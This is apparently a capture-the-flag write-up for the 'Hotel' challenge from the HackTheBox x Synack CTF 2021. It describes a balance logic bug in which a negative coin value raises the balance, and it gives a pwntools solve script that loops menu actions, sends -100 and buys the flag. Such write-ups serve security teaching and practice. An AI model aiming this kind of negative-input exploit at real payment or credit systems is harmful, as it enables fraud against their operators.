HackTheBox x Synack CTF 2021: Hotel
TL;DR
- The service has a coin/credit system with broken input validation.
- Supplying a negative value increases your balance via integer underflow/logic bug.
- After padding the state by looping the menu actions, you can add coins and buy the flag.
- Use
-100 to jump the balance high enough, then select the flag option.
Solution
from pwn import *
io = remote('ip', 31337)
# Loop through 40 times (backwards)
# This will allow us to deal with XOR in final stage
for i in range(40, 0, -1):
io.sendline('1')
io.sendlineafter(':', str(i))
# Get coins
io.sendline('2')
# Negative value to add 100 coins
io.sendlineafter('?', '-100')
# Try and get flag
io.sendline('3')
# Win?
io.interactive()